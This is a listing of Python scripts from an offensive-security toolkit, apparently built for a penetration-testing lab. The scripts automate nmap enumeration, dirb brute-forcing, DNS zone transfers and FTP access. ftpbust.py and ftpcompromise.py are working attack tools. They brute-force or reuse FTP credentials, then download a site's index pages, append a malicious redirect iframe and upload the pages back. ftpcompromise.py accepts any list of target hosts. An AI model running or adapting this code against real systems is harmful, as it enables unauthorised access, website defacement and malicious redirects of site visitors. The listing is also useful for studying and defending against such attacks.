259 | # 445 260 | if re.search('microsoft-ds', serv[cnt]): 261 | print "[+] Running smbEnum %s, %s" % (ip_address, services.port) 262 | smbEnum(ip_address, services.port) 263 | # 1433-1434 264 | if 
re.search('ms-sql', serv[cnt]): 265 | print "[+] Running mssqlEnum %s, %s" % (ip_address, services.port) 266 | mssqlEnum(ip_address, services.port) 267 | # 1521 268 | if re.search('oracle', serv[cnt]): 269 | print "[+] Running oracleEnum %s, %s" % (ip_address, services.port) 270 | oracleEnum(ip_address, services.port) 271 | # 3306 272 | if re.search('mysql', serv[cnt]): 273 | print "[+] Running mysqlEnum %s, %s" % (ip_address, services.port) 274 | mysqlEnum(ip_address, services.port) 275 | cnt += 1 276 | print 277 | print "INFO: Deep scan completed for " + ip_address 278 | else: 279 | print "OS Unknown: %s" % (osys) 280 | 281 | 282 | if re.match('Linux', osys) and osys != "": 283 | cnt = 0 284 | for services in _host.services: 285 | print "Port: "'{0: <5}'.format(services.port), "State: "'{0: <5}'.format(services.state), "Protocol: "'{0: <2}'.format(services.protocol), "Service: "'{0:<10}'.format(serv[cnt]) 286 | cnt += 1 287 | else: 288 | print "OS: Unknown %s" % (osys) 289 | 290 | -------------------------------------------------------------------------------- /dirbust.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import multiprocessing 4 | from multiprocessing import * 5 | import os 6 | import sys 7 | import re 8 | import reconf 9 | from reconf import * 10 | import time 11 | from functools import wraps 12 | import argparse 13 | import ipaddr 14 | import nmapxml 15 | from nmapxml import * 16 | 17 | parser = argparse.ArgumentParser(description='Run a short or verbose dirb scan') 18 | parser.add_argument('-ip', action='store', required=True, help='IP Address to be assessed') 19 | parser.add_argument('-s', action='store_true', required=False, help='Quick Scan') 20 | parser.add_argument('-ss', action='store_true', required=False, help='Quicker Scan') 21 | 22 | args = parser.parse_args() 23 | try: 24 | ip_address = ipaddr.IPAddress(args.ip) 25 | except: 26 | print "Try again..." 
# dirbust.py (continued): exit path of the -ip validation above.
    sys.exit()

def hms(seconds):
    """Format a duration in seconds as H:MM:SS (hours are not zero-padded)."""
    m, s = divmod(seconds, 60)
    h, m = divmod(m, 60)
    return("%d:%02d:%02d" % (h, m, s))

def fn_timer(function):
    """Decorator: call `function`, print how long it took (via hms), return its result.

    Uses function.func_name, the Python 2 spelling.
    """
    @wraps(function)
    def function_timer(*args, **kwargs):
        t0 = time.time()
        result = function(*args, **kwargs)
        t1 = time.time()
        print ("\033[0;30mTook %s \033[1;30m%s\033[0;m to complete\033[0;m" %
               (function.func_name, hms(t1-t0))
              )
        return result
    return function_timer

def multProc(targetin, scanip, port):
    """Start targetin(scanip, port) in a child process and return at once.

    The process is never joined and `jobs` is a local dropped on return,
    so the caller gets no handle to wait on or terminate it. Not called
    anywhere visible in this file.
    """
    jobs = []
    p = multiprocessing.Process(target=targetin, args=(scanip,port))
    jobs.append(p)
    p.start()
    return

@fn_timer
def dirbBlast(prot, ip_address, port, igncap, srvr):
    '''
    Run dirb against prot://ip_address:port once per wordlist chosen by -s/-ss.

    prot   = http or https
    igncap = True adds dirb's -i; set by main() for Windows/Microsoft hosts
    srvr   = vulns file name picked from the server banner; unused in this body

    Matching result lines are appended to <rsltpth>/<ip>_<port>_dirb.txt.

    NOTE(review): both `elif igncap == True` branches below repeat the `if`
    condition, so when igncap is False dirbargs stays "" and "-f -S -w" is
    never passed. If -s and -ss are both given, no branch assigns WORDLST
    and the loop raises NameError. `found` is never used.
    '''
    found = []
    dirbargs = ""
    url = "%s://%s:%s" % (prot, ip_address, port)
    print "\033[0;33m[>]\033[0;m Running dirb scan for %s" % (url)
    outfile = "%s/%s_%s_dirb.txt" % (reconf.rsltpth, ip_address, port)
    extlst = "%s/%s" % (reconf.wordlst, 'extensions_common.txt')
    if igncap == True:
        dirbargs = "-i -f -S -w"
    elif igncap == True:
        dirbargs = "-f -S -w"

    # Wordlist selection: every file in the directory, or the moderate/short
    # comma-separated lists from reconf.
    if args.s is False and args.ss is False:
        WORDLST = os.listdir(reconf.wordlst)
        tfiles = len([name for name in os.listdir(reconf.wordlst) if os.path.isfile(os.path.join(reconf.wordlst, name))])
    if args.s is True and args.ss is False:
        WORDLST = reconf.moderlst.split(",")
        tfiles = len(WORDLST)
    if args.ss is True and args.s is False:
        WORDLST = reconf.shortlst.split(",")
        tfiles = len(WORDLST)

    i = 1
    for filename in WORDLST:
        fn = "%s/%s" % (reconf.wordlst, filename)
        if igncap == True:
            dirbargs = "-i -f -S -w"
        elif igncap == True:
            dirbargs = "-f -S -w"
        if os.path.isfile(fn):
            print "\033[0;30m[ %s of %s ] Parsing thru %s/%s\033[0;m" % (i, tfiles, reconf.wordlst, 
filename) 90 | DIRBSCAN = "dirb %s -a \"%s\" %s/%s %s -x %s" % (url, reconf.uagnt5, reconf.wordlst, filename, dirbargs, extlst) 91 | try: 92 | results = subprocess.check_output(DIRBSCAN, shell=True) 93 | resultarr = results.split("\n") 94 | for line in resultarr: 95 | if re.match(r'\A[+]', line) or re.search(r'DIRECTORY', line): 96 | print "[+] Found -> %s" % (line) 97 | with open(outfile, 'a') as file: 98 | file.write("%s\n" % line) 99 | if os.path.isfile(fn): i += 1 100 | except: 101 | pass 102 | 103 | def typeHDR(pattern): 104 | files = os.listdir(reconf.vulns) 105 | for file in files: 106 | if file.find(pattern) != -1: 107 | return file 108 | 109 | def typeSRVR(ip_address, port): 110 | wbxml = "%s/%s_%s_httpheader.xml" % (reconf.exampth, ip_address, port) 111 | try: 112 | info = minidom.parse(wbxml) 113 | protocol, port_number, service, product, version = nmapxml.generic_Info(info) 114 | 115 | vulfiles = ['apache','cgis','domino','fatwire','hpsmh','iis','jboss','jrun','oracle','sap','sunas','tomcat','weblogic','axis','coldfusion','frontpage','hyperion','iplanet','jersey','netware','ror','sharepoing','test','vignette','websphere'] 116 | for file in vulfiles: 117 | if re.search(file, product, re.IGNORECASE): 118 | srvr = typeHDR(file) 119 | return(srvr) 120 | except: 121 | if os.path.isfile(wbxml): 122 | print "Something broke...." 123 | elif not os.path.isfile(wbxml): 124 | print "%s doesn't seem to exists!" 
% (wbxml) 125 | SNMAP = "nmap -sV -vv -Pn -n -p %s --script=http-headers -oA %s/%s_%s_httpheader %s" % (port, reconf.exampth, ip_address, port, ip_address) 126 | print "Excuting %s" % (SNMAP) 127 | subprocess.call(SNMAP, shell=True) 128 | if os.path.isfile(wbxml): 129 | typeSRVR(ip_address, port) 130 | pass 131 | 132 | def vpnstatus(): 133 | return int(os.popen('ifconfig tap0 | wc -l').read().split()[0]) 134 | 135 | if __name__=='__main__': 136 | # Check if VPN to the Offsec lab is up 137 | if not vpnstatus() > 1: 138 | print "You forgot to connect to the lab" 139 | sys.exit() 140 | 141 | xml_path = "%s/%s.xml" % (reconf.exampth, ip_address) 142 | try: 143 | info = minidom.parse(xml_path) 144 | opsys = nmapxml.get_OS(info) 145 | except: 146 | if os.path.isfile(xml_path): 147 | print "Something broke..." 148 | else: 149 | print "%s doesn't seem to exists!" % (xml_path) 150 | pass 151 | 152 | print "\033[1;33m[*]\033[0;m Operating System is %s" % (opsys) 153 | 154 | if re.search(r'Windows|Microsoft', opsys): 155 | igncap = True 156 | else: 157 | igncap = False 158 | 159 | print "\033[1;32m[*]\033[0;m Parsing %s/%s.nmap" % (reconf.exampth, ip_address) 160 | 161 | fnmap = "%s/%s.nmap" % (reconf.exampth, ip_address) 162 | with open(fnmap, 'r') as searchfile: 163 | for line in searchfile: 164 | if 'open' in line and re.search('http|ssl/http|https', line): 165 | port = re.split('\s+', line)[0] 166 | port = re.split('\/', port)[0].strip() 167 | prot = re.split('\s+', line)[2].strip() 168 | prot = re.split('\?', prot)[0].strip() 169 | if 'ssl/http' in line: prot = 'https' 170 | srvr = typeSRVR(ip_address, port) 171 | #print "%s %s %s %s" % (ip_address, igncap, port, srvr) 172 | dirbBlast(prot, ip_address, port, igncap, srvr) 173 | -------------------------------------------------------------------------------- /dnsrecon.org: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import 
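import multiprocessing
from multiprocessing import *
import os
import sys
import re
import reconf
from reconf import *
import time
from functools import wraps
import argparse
import ipaddr
import nmapxml
from nmapxml import *

parser = argparse.ArgumentParser(description='Attempt a DNS zone transfer via the host\'s NetBIOS name')
parser.add_argument('-ip', action='store', required=True, help='IP Address to be assessed')

args = parser.parse_args()
try:
    ip_address = str(ipaddr.IPAddress(args.ip))
except ValueError:
    print("Try again...")
    sys.exit()

LAB_DOMAIN = "thinc.local"    # lab domain hard-coded by the original; the NetBIOS name is appended to it


def netbios_hostname(ip):
    """Return the first non-group <00> NetBIOS name from `nmblookup -A ip`, or '' if none.

    The original shelled out to `nmblookup ... | grep '<00>' | grep -v '' | cut -d' ' -f1`.
    As shown in this listing `grep -v ''` excludes every line (the empty pattern matches
    all of them), so the host was always empty; the filter is presumably meant to drop
    `<GROUP>` entries, which is what is done here -- confirm against the original source.
    Parsing in Python also keeps the remote-supplied name out of any shell command line.
    """
    try:
        out = subprocess.check_output(["nmblookup", "-A", ip])
    except (subprocess.CalledProcessError, OSError):
        return ""
    if not isinstance(out, str):
        out = out.decode('utf-8', 'replace')
    for line in out.splitlines():
        if '<00>' in line and '<GROUP>' not in line:
            fields = line.split()
            if fields:
                return fields[0]
    return ""


host = netbios_hostname(ip_address)
if not host:
    print("INFO: No NetBIOS hostname for " + ip_address + ", skipping zone transfer")
    sys.exit()
print("INFO: Attempting Domain Transfer on " + host)
# No shell here: `host` is data returned by the target (its NetBIOS reply).  The original
# interpolated it into "dig @%s.thinc.local ..." with shell=True, so a crafted name could
# have injected shell commands.
ZT = ["dig", "@%s.%s" % (host, LAB_DOMAIN), LAB_DOMAIN, "axfr"]
try:
    ztresults = subprocess.check_output(ZT)
except (subprocess.CalledProcessError, OSError) as e:
    # dig exits non-zero when the server does not answer; the original raised here.
    print("INFO: Zone Transfer failed for " + host + " (" + str(e) + ")")
    sys.exit()
if not isinstance(ztresults, str):
    ztresults = ztresults.decode('utf-8', 'replace')
if "failed" in ztresults:
    print("INFO: Zone Transfer failed for " + host)
else:
    # ip_address is a str here; the original concatenated an ipaddr object and raised TypeError.
    print("[*] Zone Transfer successful for " + host + "(" + ip_address + ")!!! [see output file]")
    outfile = "%s/%s_zonetransfer.txt" % (reconf.exampth, ip_address)
    with open(outfile, "w") as dnsf:    # the original wrote `dnsf.close` without calling it
        dnsf.write(ztresults)

# -------------------------------------------------------------------------------
# /dnsrecon.py:
# -------------------------------------------------------------------------------
#!/usr/bin/env python
import subprocess
from subprocess import *
import sys
import os
import re
import reconf
from reconf import *
import argparse
import ipaddr
import nmapxml
from nmapxml import *
import dns.name
import dns.query
import dns.dnssec
import dns.message
import dns.resolver
import dns.rdatatype
import dns.zone

parser = argparse.ArgumentParser(description='Run a DNS scan')
parser.add_argument('-ip', action='store', required=True, help='IP Address to be assessed')

args = parser.parse_args()
try:
    ip_address = ipaddr.IPAddress(args.ip)
    ip_address = str(ip_address)
except ValueError:
    print("Not a valid IP. Try again...")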
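# (tail of dnsrecon.py's address-validation `except` block, which begins on the listing line above)
    sys.exit()


def turnc_ad(s, d, n=3):
    """Keep the first n fields of s split on d, e.g. turnc_ad('10.11.1.5', '.') -> '10.11.1'."""
    return d.join(s.split(d)[:n])


def turnc_bc(s, d, n=1):
    """Drop the first n fields of s split on d, e.g. turnc_bc('host.example.com', '.') -> 'example.com'."""
    return d.join(s.split(d)[n:])


sbn = turnc_ad(ip_address, '.')    # /24 prefix of the target; names the DNS-server discovery scan

print("SBN %s" % sbn)

# Find DNS servers (udp/tcp 53) across the lab range once per /24; reuse the XML if it exists.
dnsfile = "%s/%s_DNSDIS.xml" % (reconf.exampth, sbn)
if not os.path.isfile(dnsfile):
    # reconf.fulliprng may hold several space-separated ranges, hence split().
    DNSDIS = ["nmap", "-sV", "-vv", "-Pn", "-n", "-p", "U:53,T:53", "--open",
              "-oA", "%s/%s_DNSDIS" % (reconf.exampth, sbn)] + reconf.fulliprng.split()
    subprocess.call(DNSDIS)
    if not os.path.isfile(dnsfile):
        print("%s was not produced; cannot continue" % dnsfile)
        sys.exit()

info = minidom.parse(dnsfile)
dnslst = [s for s in nmapxml.get_All_IP(info).split(',') if s]
if not dnslst:
    print("No DNS servers found in %s" % dnsfile)
    sys.exit()

myresolver = dns.resolver.Resolver()
myresolver.nameservers = dnslst
reverseip = '.'.join(ip_address.split('.')[::-1])
ptrlookup = reverseip + '.in-addr.arpa'
try:
    hostname = str(myresolver.query(ptrlookup, "PTR")[0]).rstrip('.')
except Exception as e:    # NXDOMAIN / timeout: the original died here with a traceback
    print("PTR lookup for %s failed: %s" % (ptrlookup, e))
    sys.exit()
domain = turnc_bc(hostname, '.')
domindot = domain + '.'

request = dns.message.make_query(domindot, dns.rdatatype.DNSKEY, want_dnssec=True)

outfile = "%s/%s_dnschk" % (reconf.rsltpth, ip_address)
with open(outfile, 'a') as report:
    report.write("Hostname: %s\n" % hostname)
    report.write("Domain: %s\n" % domain)

    for nserver in dnslst:
        try:
            response = dns.query.udp(request, nserver)
        except Exception as e:
            report.write("DNSKEY query to %s failed: %s\n" % (nserver, e))
            continue
        report.write("Response %s\n" % response)
        report.write("Answer: %s\n" % response.answer)
        report.write("Response Code: %s\n" % response.rcode())
        # `domain` is derived from the target's PTR record, i.e. attacker-controlled DNS data,
        # so it is passed as a literal argv element instead of being interpolated into a
        # shell string as the original did.
        DNSCHK = ["nmap", "-vv", "-sn", "-Pn", nserver,
                  "-oA", "%s/%s_DNSZONE" % (reconf.rsltpth, ip_address),
                  "--script", "dns-check-zone",
                  "--script-args", "dns-check-zone.domain=%s" % domain]
        subprocess.call(DNSCHK)
        try:
            zone = dns.zone.from_xfr(dns.query.xfr(nserver, domindot, lifetime=5))
        except Exception as e:
            # A refused AXFR is the expected case; record it instead of silently moving on.
            report.write("AXFR %s @ %s refused or failed: %s\n" % (domain, nserver, e))
            continue
        # Getting a zone object back means the transfer succeeded.  The original compared
        # the zone to "" (never true) so this branch was dead, and its write() call had a
        # %-precedence bug ("%s %s" % name, rdataset) that would have raised TypeError.
        report.write("Success: %s @ %s\n" % (domain, nserver))
        for name, node in zone.nodes.items():
            for rdataset in node.rdatasets:
                report.write("%s %s\n" % (name, rdataset))
# -------------------------------------------------------------------------------
# /exploitdb.txt:
# -------------------------------------------------------------------------------
# https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/vulscan.nse
# -------------------------------------------------------------------------------
# /f.py:
# -------------------------------------------------------------------------------
#!/usr/bin/env python

import subprocess
import multiprocessing
from multiprocessing import *
import os
import sys
import re
import reconf
from reconf import *
import time
from functools import wraps
import argparse
import ipaddr
import nmapxml
from nmapxml import *
import ftputil
import ftplib

parser = argparse.ArgumentParser(description='Scan for FTP websites using creds discovered with hydra, search for index files append malicous code into it, then upload it back')
parser.add_argument('-ip', action='store', required=True, help='IP Address to be assessed')

args = parser.parse_args()
try:
    ip_address = ipaddr.IPAddress(args.ip)
except ValueError:
    print("Try again...")
    sys.exit()

ip_address = str(ip_address)


def ftpLogin(ip_address, u, p):
    """Open an ftputil.FTPHost session as u/p; return it, or None when the login is rejected.

    ftputil login/connect failures are FTPOSError, an OSError subclass, which is what is
    caught.  Callers must check for None -- the original passed it straight to .walk().
    """
    try:
        ftp = ftputil.FTPHost(ip_address, u, p)
    except OSError:
        print("[-] %s - FTP using %s/%s is not allowed" % (ip_address, u, p))
        return None
    print("[+] %s - FTP using %s/%s is Permitted" % (ip_address, u, p))
    return ftp


fnmap = "%s/%s_ftp_hydra.txt" % (reconf.rsltpth, ip_address)
try:
    print("\033[1;31m [!] \033[0;m Parsing %s for creds" % (fnmap))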
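# (inside f.py's top-level `try:` that opens on the previous listing line)
    with open(fnmap, 'r') as searchfile:
        # hydra lines: "[21][ftp] host: 10.1.1.1   login: admin   password: admin".  A regex
        # also copes with an empty password, where the original's split()[6] raised IndexError.
        cred_re = re.compile(r'login:\s*(\S*)\s+password:\s*(\S*)')
        for line in searchfile:
            m = cred_re.search(line)
            if m is None:
                continue
            u, p = m.group(1), m.group(2)
            ftp = ftpLogin(ip_address, u, p)
            if ftp is None:    # rejected login; the original called .walk() on None
                continue
            for root, dirs, files in ftp.walk("/", topdown=True, onerror=None):
                for dlst in dirs:
                    if dlst != "":
                        print("%s\n" % dlst)
                for fname in files:
                    if fname == "":
                        continue
                    print("%s/%s\n" % (root, fname))
                    if re.search(r'^(index)[.](htm|html|asp|php)', fname):
                        print("[+] Found default page %s at %s" % (fname, root))
                        # upload_if_newer(local, remote) is an upload: it overwrites the target's
                        # live page with a local file named `fname` from the CWD (if newer) and
                        # never fetched anything -- the original's "Downloading" message was wrong.
                        try:
                            print("Uploading local %s over %s/%s with U %s P %s" % (fname, root, fname, u, p))
                            ftp.upload_if_newer(fname, ("%s/%s" % (root, fname)))
                        except Exception as e:
                            print(e)
            ftp.close()
except Exception as e:
    print("[-] %s" % e)    # the original swallowed this silently
finally:
    print("\033[1;31m [!] \033[0;m Assessment Complete.")
# -------------------------------------------------------------------------------
# /f1.py:
# -------------------------------------------------------------------------------
#!/usr/bin/env python
import subprocess
import multiprocessing
from multiprocessing import *
import os
import sys
import re
import reconf
from reconf import *
import time
from functools import wraps
import argparse
import ipaddr
import nmapxml
from nmapxml import *
import ftputil

parser = argparse.ArgumentParser(description='Walk an FTP server (anonymous or brute-forced creds) and list its contents')
parser.add_argument('-ip', action='store', required=True, help='IP Address to be assessed')

args = parser.parse_args()
try:
    ip_address = ipaddr.IPAddress(args.ip)
except ValueError:
    print("Try again...")
    sys.exit()

ip_address = str(ip_address)

ANON_USER, ANON_PASS = "anonymous", "a@a.com"


def anonLogin(ip_address):
    """True if anonymous FTP login succeeds; the probe session is closed again."""
    try:
        ftp = ftputil.FTPHost(ip_address, ANON_USER, ANON_PASS)
    except Exception as e:
        print("[-] %s - Anonymous FTP not allowed" % ip_address)
        return False
    ftp.close()    # the original leaked this probe connection
    print("[+] %s - Anonymous FTP is Permitted" % ip_address)
    return True


def bruteLogin(ip_address):
    """Run brutepwd.py (hydra) against FTP on ip_address and print its output.

    Returns the anonymous pair, exactly as the original did: hydra's findings land in
    <rsltpth>/<ip>_ftp_hydra.txt (see ftpbust.py) and are not parsed here.
    """
    # ip_address passed ipaddr validation above; it is handed over as a literal argv element.
    results = subprocess.check_output(["./brutepwd.py", "-ip", ip_address, "-s", "ftp", "-hy"])
    print(results)
    return (ANON_USER, ANON_PASS)


outfile = "%s/%s_ftpwalk.txt" % (reconf.rsltpth, ip_address)
hydra_out = "%s/%s_ftp_hydra.txt" % (reconf.rsltpth, ip_address)
ftp = None
if anonLogin(ip_address):
    ftp = ftputil.FTPHost(ip_address, ANON_USER, ANON_PASS)
elif os.path.isfile(hydra_out):
    # The original had an empty `if` body here -- a SyntaxError, so the script never ran.
    # Logging in with the hydra results is ftpbust.py's job; the file is only reported.
    print("[*] %s exists; use ftpbust.py to log in with the discovered creds" % hydra_out)
else:
    usern, password = bruteLogin(ip_address)
    ftp = ftputil.FTPHost(ip_address, usern, password)    # still the anonymous pair, as before

with open(outfile, 'w') as f:    # the original never closed this handle
    if ftp is not None:
        try:
            for root, dirs, files in ftp.walk("/", topdown=True, onerror=None):
                for dlst in dirs:
                    if dlst != "":
                        f.write("%s\n" % dlst)
                for fname in files:
                    if fname != "":
                        f.write("%s/%s\n" % (root, fname))
                        if re.search(r'^(index)[.](htm|html|asp|php)', fname):
                            print("[+] Found default page %s at %s" % (fname, root))
        except Exception as e:
            print("[-] walk of %s failed: %s" % (ip_address, e))
        ftp.close()    # the original wrote `ftp.close` without calling it
# -------------------------------------------------------------------------------
# /ftpbust.py:
# -------------------------------------------------------------------------------
#!/usr/bin/env python

import subprocess
import multiprocessing
from multiprocessing import *
import os
import sys
import re
import reconf
from reconf import *
import time
from functools import wraps
import argparse
import ipaddr
import nmapxml
from nmapxml import *
import ftputil

# Console tag prefixes (ANSI colour + bracketed marker).
RED = '\033[1;31m[#]\033[0;m'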
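# (ftpbust.py continues; the console tag prefixes are ANSI colour + bracketed marker)
RED = '\033[1;31m[#]\033[0;m'
GREEN = '\033[1;32m[*]\033[0;m'
YELLOW = '\033[1;33m[!]\033[0;m'
BLUE = '\033[1;34m[+]\033[0;m'
PURPLE = '\033[1;35m[+]\033[0;m'
CYAN = '\033[1;36m[+]\033[0;m'
WHITE = '\033[1;37m[*]\033[0;m'

parser = argparse.ArgumentParser(description='Scan for FTP websites using creds discovered with hydra, search for index files append malicous code into it, then upload it back')
parser.add_argument('-ip', action='store', required=True, help='IP Address to be assessed')

args = parser.parse_args()
try:
    ip_address = ipaddr.IPAddress(args.ip)
except ValueError:
    # The original printed `ip_address` here, which is unbound on this path (NameError).
    print("%s %s is not correct. Try again..." % (RED, args.ip))
    sys.exit()

ip_address = str(ip_address)


def ftpLogin(ip_address, u, p):
    """Open an ftputil.FTPHost session as u/p; return it, or None when the login is rejected.

    ftputil raises FTPOSError (an OSError subclass) for rejected logins and connection
    failures.  Callers must check for None; the original handed it straight to .walk().
    """
    try:
        ftp = ftputil.FTPHost(ip_address, u, p)
    except OSError as error:
        print("%s FTP to %s using creds %s:%s is not allowed" % (RED, ip_address, u, p))
        return None
    print("%s FTP to %s using %s/%s is Permitted" % (GREEN, ip_address, u, p))
    return ftp


def injectPage(fname):
    """Append reconf.iframe1 to the local file fname (which is then uploaded back to the target)."""
    print("%s Inserting code into %s" % (RED, fname))
    with open(fname, 'a') as f:
        f.write(reconf.iframe1)


def _walk_and_inject(ftp, u, p, fw, seenfname):
    """Walk the whole FTP tree, log every entry to fw, and inject the iframe into index pages.

    For each index.{htm,html,asp,php} -- first occurrence of a given file name only, as in
    the original -- the page is downloaded to the CWD, reconf.iframe1 appended locally and
    the file uploaded back with upload_if_newer(), i.e. the target's live page is modified.
    """
    for root, dirs, files in ftp.walk("/", topdown=True, onerror=None):
        for dlst in dirs:
            print("%s Discovered the following directory %s" % (GREEN, dlst))
            fw.write("Directory: %s\n" % (dlst))
        for fname in files:
            print("%s Discovered the following file %s in %s directory" % (GREEN, fname, root))
            fw.write("File: %s/%s\n" % (root, fname))
            if not re.search(r'^(index)[.](htm|html|asp|php)', fname):
                continue
            print("%s Found default page %s at %s" % (YELLOW, fname, root))
            if fname in seenfname:
                continue
            seenfname.add(fname)
            remote = "%s/%s" % (root, fname)
            try:
                print("%s Downloading %s with U %s P %s" % (YELLOW, fname, u, p))
                ftp.download(remote, fname)
                fw.write("Downloaded %s\n" % fname)
                injectPage(fname)
                fw.write("Injected following code %s into %s\n" % (reconf.iframe1, fname))
            except Exception as e:
                print("%s Could not download/inject %s: %s" % (RED, remote, e))
                continue
            try:
                print("%s Uploading %s back to %s in %s" % (YELLOW, fname, ip_address, root))
                ftp.upload_if_newer(fname, remote)
                # Logged only once the upload returned; the original wrote "successful" beforehand.
                fw.write("Uploaded %s was successful.\n" % fname)
            except Exception as e:
                print("%s Could not upload %s back to %s in %s (%s)" % (RED, fname, ip_address, root, e))
                fw.write("Uploading of %s was not completed using %s:%s.\n" % (fname, u, p))


fnmap = "%s/%s_ftp_hydra.txt" % (reconf.rsltpth, ip_address)
if os.path.isfile(fnmap):
    print("%s Checking if %s exists" % (GREEN, fnmap))
else:
    print("%s %s doesn't exists, running brute force to find creds" % (YELLOW, fnmap))
    # ip_address passed ipaddr validation; it is a literal argv element, no shell involved.
    BRUTEUS = ["./brutepwd.py", "-ip", ip_address, "-s", "ftp", "-hy"]
    try:
        if os.path.isfile('hydra.restore'):    # a stale session file would resume an old hydra run
            os.remove('hydra.restore')
        subprocess.call(BRUTEUS)
    except (subprocess.CalledProcessError, OSError) as e:
        print("%s brute force could not be started: %s" % (RED, e))
    finally:
        print("%s Brute force of %s is completed." % (GREEN, ip_address))

fwname = "%s/%s_ftp_results.txt" % (reconf.rsltpth, ip_address)
print("%s Parsing %s for creds" % (GREEN, fnmap))
# hydra lines: "[21][ftp] host: 10.1.1.1   login: admin   password: admin".  The regex
# tolerates an empty password, where the original's split()[6] raised IndexError.
cred_re = re.compile(r'login:\s*(\S*)\s+password:\s*(\S*)')
seenusrpwd = set()
seenfname = set()
try:
    # Both files are context-managed: the original closed fw in `finally`, which raised
    # NameError whenever fnmap could not be opened.
    with open(fnmap, 'r') as searchfile, open(fwname, 'w') as fw:
        for line in searchfile:
            m = cred_re.search(line)
            if m is None:
                continue
            u, p = m.group(1), m.group(2)
            usrpwd = "%s:%s" % (u, p)
            if usrpwd in seenusrpwd:
                continue
            seenusrpwd.add(usrpwd)
            print("%s Using %s creds to FTP into %s" % (GREEN, usrpwd, ip_address))
            ftp = ftpLogin(ip_address, u, p)
            if ftp is None:
                continue
            fw.write("Creds: %s\n" % usrpwd)
            try:
                _walk_and_inject(ftp, u, p, fw, seenfname)
            except Exception as e:
                print("%s Walking %s as %s failed: %s" % (RED, ip_address, usrpwd, e))
            finally:
                ftp.close()
except IOError as e:
    print("%s Could not open %s: %s" % (RED, fnmap, e))
finally:
    print("%s Assessment Complete." % GREEN)
# -------------------------------------------------------------------------------
# /ftpcompromise.py:
# -------------------------------------------------------------------------------
#!/usr/bin/env python
import ftplib
import optparse
import sys
import time

ANON_USER, ANON_PASS = 'anonymous', 'me@your.com'


def anonLogin(hostname):
    """True if anonymous FTP login to hostname succeeds; the session is closed again."""
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login(ANON_USER, ANON_PASS)
        print('\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded.')
        ftp.quit()
        return True
    except Exception as e:
        print('\n[-] ' + str(hostname) + ' FTP Anonymous Logon Failed.')
        return False


def bruteLogin(hostname, passwdFile):
    """Try each "user:pass" line of passwdFile against hostname, one attempt per second.

    Returns the first working (user, password), else (None, None).  Lines without a ':'
    are skipped -- the original's split(':')[1] raised IndexError on them -- and the
    password is everything after the first ':'.  A fresh control connection is opened
    for every attempt.
    """
    with open(passwdFile, 'r') as pF:    # the original never closed this file
        for line in pF:
            line = line.rstrip('\r\n')
            if ':' not in line:
                continue
            userName, passWord = line.split(':', 1)
            time.sleep(1)    # throttle, as in the original
            print('[+] Trying: ' + userName + '/' + passWord)
            try:
                ftp = ftplib.FTP(hostname)
                ftp.login(userName, passWord)
                print('\n[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + userName + '/' + passWord)
                ftp.quit()
                return (userName, passWord)
            except Exception as e:
                pass
    print('\n[-] Could not brute force FTP credentials.')
    return (None, None)


def returnDefault(ftp):
    """List the FTP working directory and return names that look like web pages (.php/.htm/.asp).

    Returns [] when the listing fails; the original returned None there, which made the
    `for` loop in attack() raise TypeError.
    """
    try:
        dirList = ftp.nlst()
    except Exception:
        print('[-] Could not list directory contents.')
        print('[-] Skipping To Next Target.')
        return []
    retList = []
    for fileName in dirList:
        fn = fileName.lower()
        if '.php' in fn or '.htm' in fn or '.asp' in fn:
            print('[+] Found default page: ' + fileName)
            retList.append(fileName)
    return retList


def injectPage(ftp, page, redirect):
    """Download `page`, append `redirect` to it and upload it back over the original.

    This modifies the live page on the target.  retrlines() hands the callback each line
    without its newline, so lines are re-joined here; the original wrote them back to
    back and collapsed the whole page onto one line.  The working copy <page>.tmp is left
    in the CWD, as before.
    """
    tmp = page + '.tmp'
    lines = []
    ftp.retrlines('RETR ' + page, lines.append)
    print('[+] Downloaded Page: ' + page)

    with open(tmp, 'w') as f:
        f.write('\n'.join(lines) + '\n')
        f.write(redirect)
    print('[+] Injected Malicious IFrame on: ' + page)

    with open(tmp, 'rb') as f:    # storlines reads the file object line by line (bytes on Python 3)
        ftp.storlines('STOR ' + page, f)
    print('[+] Uploaded Injected Page: ' + page)


def attack(username, password, tgtHost, redirect):
    """Log in to tgtHost as username/password and inject `redirect` into every default page found."""
    ftp = ftplib.FTP(tgtHost)
    try:
        ftp.login(username, password)
        for defPage in returnDefault(ftp):
            injectPage(ftp, defPage, redirect)
    finally:
        ftp.close()    # the original left the session open


def main():
    # The <...> placeholders of the usage string were lost in this listing; they are
    # restored from the option help text below.
    parser = optparse.OptionParser('usage %prog -H <target host[s]> -r <redirection page> [-f <user/password file>]')

    parser.add_option('-H', dest='tgtHosts', type='string', help='specify target host')
    parser.add_option('-f', dest='passwdFile', type='string', help='specify user/password file')
    parser.add_option('-r', dest='redirect', type='string', help='specify a redirection page')

    (options, args) = parser.parse_args()
    # Checked before str()-conversion: the original compared str(None).split(',') == ['None']
    # with None, so a missing -H was never caught.
    if options.tgtHosts is None or options.redirect is None:
        print(parser.usage)
        sys.exit(0)
    tgtHosts = options.tgtHosts.split(',')
    passwdFile = options.passwdFile
    redirect = options.redirect

    for tgtHost in tgtHosts:
        if anonLogin(tgtHost):
            print('[+] Using Anonymous Creds to attack')
            attack(ANON_USER, ANON_PASS, tgtHost, redirect)
        elif passwdFile is not None:
            (username, password) = bruteLogin(tgtHost, passwdFile)
            if password is not None:
                # The original built this message as a bare expression and never printed it.
                print('[+] Using Creds: ' + username + '/' + password + ' to attack')
                attack(username, password, tgtHost, redirect)


if __name__ == '__main__':
    main()
# -------------------------------------------------------------------------------
# /ftprecon.py:
# -------------------------------------------------------------------------------
#!/usr/bin/env python
import subprocess
import sys
import os
import reconf
from reconf import *

if len(sys.argv) != 3:
    # Argument placeholders were lost in this listing; restored from how argv is used below.
    print("Usage: ftprecon.py <ip_address> <port>")
    sys.exit(0)

ip_address = sys.argv[1].strip()
port = sys.argv[2].strip()
if not port.isdigit():
    print("Port must be numeric: %r" % port)
    sys.exit(1)

print("INFO: Performing nmap FTP script scan for " + ip_address + ":" + port)
# argv values go to nmap as literal arguments (the original interpolated them into a shell
# string).  -oA takes a basename, so the "_ftp.nmap" suffix produces <ip>_ftp.nmap.nmap /
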